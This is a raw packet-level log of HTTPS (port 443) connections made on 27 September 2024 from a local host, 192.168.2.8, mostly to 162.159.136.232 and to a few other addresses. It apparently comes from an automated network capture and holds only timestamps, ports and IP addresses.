Sep 27, 2024 18:19:08.252118111 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.252135992 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.555094957 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.555584908 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.555600882 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.557111025 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.557210922 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.558406115 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.558491945 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.558494091 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.558506966 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.558514118 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.581677914 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.582576990 CEST	49764	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.582613945 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.583976984 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.584044933 CEST	49764	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.585191011 CEST	49764	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.585251093 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.585345030 CEST	49764	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.585352898 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.585397005 CEST	49764	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.611610889 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.611622095 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.627441883 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.658541918 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.715526104 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.716031075 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.716048002 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.717118979 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.717202902 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.718396902 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.718466997 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.718575954 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.718586922 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.718609095 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.759447098 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.767929077 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.768193960 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.768548965 CEST	443	49765	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.768616915 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.769042015 CEST	49765	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.770112991 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.770200014 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.770294905 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.770682096 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.770715952 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.771069050 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.771193027 CEST	443	49764	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.771244049 CEST	49764	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.771766901 CEST	49764	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.772655964 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.772699118 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.772778034 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.773163080 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.773179054 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.895596027 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.895725965 CEST	443	49766	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.895834923 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.906407118 CEST	49766	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.907040119 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.907103062 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:08.907237053 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.907596111 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:08.907610893 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.232490063 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.234545946 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.234560013 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.236592054 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.236654997 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.246910095 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.247026920 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.247056961 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.247061968 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.258305073 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.271904945 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.271934032 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.273184061 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.273241043 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.288602114 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.288722038 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.288738012 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.288765907 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.291407108 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.299067974 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.299078941 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.330379963 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.330404997 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.346029997 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.377177954 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.406724930 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.407242060 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.407270908 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.408387899 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.408451080 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.409902096 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.409977913 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.409996986 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.410037994 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.410058975 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.413506031 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.413661003 CEST	443	49767	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.413722992 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.416302919 CEST	49767	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.455302954 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.457607985 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.457756042 CEST	443	49768	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.457809925 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.458328009 CEST	49768	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.459230900 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.459275007 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.459335089 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.459748030 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.459764957 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.604654074 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.604780912 CEST	443	49769	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.604892969 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.605396032 CEST	49769	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.606265068 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.606312037 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.606379986 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.606708050 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.606724977 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.924037933 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.927009106 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.927031040 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.928199053 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.928271055 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.929492950 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.929599047 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.929601908 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.929640055 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.929650068 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:09.970994949 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:09.971023083 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.017873049 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.071757078 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.072297096 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.072324038 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.073772907 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.073858023 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.075020075 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.075103045 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.075119019 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.075189114 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.075196028 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.104388952 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.104548931 CEST	443	49770	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.104701996 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.105128050 CEST	49770	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.127244949 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.286144018 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.286334991 CEST	443	49771	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.286396027 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.286912918 CEST	49771	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.287947893 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.288047075 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.288224936 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.288702011 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.288732052 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.762238979 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.762712002 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.762744904 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.763865948 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.763942003 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.765180111 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.765254021 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.765296936 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.765335083 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.765346050 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.814699888 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.954565048 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.954694033 CEST	443	49772	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.954771996 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.955406904 CEST	49772	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.956423998 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.956461906 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:10.956542015 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.956896067 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:10.956904888 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.412472963 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.413002968 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.413028002 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.414073944 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.414139986 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.415582895 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.415649891 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.415725946 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.415734053 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.415760994 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.459398985 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.470932961 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.620800972 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.620942116 CEST	443	49773	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:11.621264935 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.621761084 CEST	49773	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:11.624015093 CEST	49774	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:11.624073029 CEST	443	49774	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:11.624232054 CEST	49774	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:12.353055954 CEST	49774	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:12.353085041 CEST	443	49774	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:12.992681980 CEST	443	49774	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:12.993309975 CEST	49774	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:12.993334055 CEST	443	49774	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:12.994436979 CEST	443	49774	45.112.123.126	192.168.2.8
Sep 27, 2024 18:19:12.994505882 CEST	49774	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:12.995753050 CEST	49774	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:12.995889902 CEST	49774	443	192.168.2.8	45.112.123.126
Sep 27, 2024 18:19:12.997338057 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:12.997366905 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:12.997430086 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:12.997746944 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:12.997761965 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.452732086 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.453151941 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.453186035 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.454269886 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.454336882 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.455724955 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.455797911 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.455832005 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.499428988 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.502204895 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.502211094 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.549071074 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.586445093 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.586565971 CEST	443	49775	172.67.74.152	192.168.2.8
Sep 27, 2024 18:19:13.586613894 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.587007046 CEST	49775	443	192.168.2.8	172.67.74.152
Sep 27, 2024 18:19:13.587914944 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:13.587955952 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:13.588028908 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:13.588342905 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:13.588359118 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.420686007 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.422626019 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.422646046 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.423856974 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.423922062 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.425344944 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.425426006 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.425448895 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.467411995 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.486566067 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.486603022 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.547775984 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.619669914 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.619782925 CEST	443	49776	159.89.102.253	192.168.2.8
Sep 27, 2024 18:19:14.619920015 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.665476084 CEST	49776	443	192.168.2.8	159.89.102.253
Sep 27, 2024 18:19:14.666528940 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:14.666572094 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:14.668457031 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:14.668895960 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:14.668906927 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.147625923 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.148113012 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.148155928 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.149374008 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.149449110 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.150659084 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.150746107 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.150777102 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.150896072 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.150913954 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.205342054 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.592849016 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.593043089 CEST	443	49777	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.593092918 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.593728065 CEST	49777	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.594813108 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.594846010 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:15.594938993 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.595268011 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:15.595278025 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.083772898 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.084204912 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.084218025 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.085298061 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.085370064 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.086869955 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.086936951 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.086981058 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.087008953 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.087016106 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.127237082 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.265887976 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.266077995 CEST	443	49778	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.266287088 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.266824961 CEST	49778	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.267983913 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.268024921 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.268135071 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.268515110 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.268527031 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.731723070 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.734988928 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.735008001 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.736087084 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.736176968 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.737543106 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.737603903 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.737804890 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.737804890 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.737818003 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.783646107 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.919975042 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.920100927 CEST	443	49779	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.920182943 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.920768976 CEST	49779	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.921775103 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.921825886 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:16.921928883 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.922251940 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:16.922261953 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.406423092 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.407018900 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.407040119 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.408164978 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.408435106 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.410351992 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.410415888 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.410425901 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.410474062 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.455398083 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.455409050 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.455430984 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.502199888 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.612519026 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.612683058 CEST	443	49780	162.159.136.232	192.168.2.8
Sep 27, 2024 18:19:17.612750053 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.613229990 CEST	49780	443	192.168.2.8	162.159.136.232
Sep 27, 2024 18:19:17.614253998 CEST	49781	443	192.168.2.8	162.159.136.232
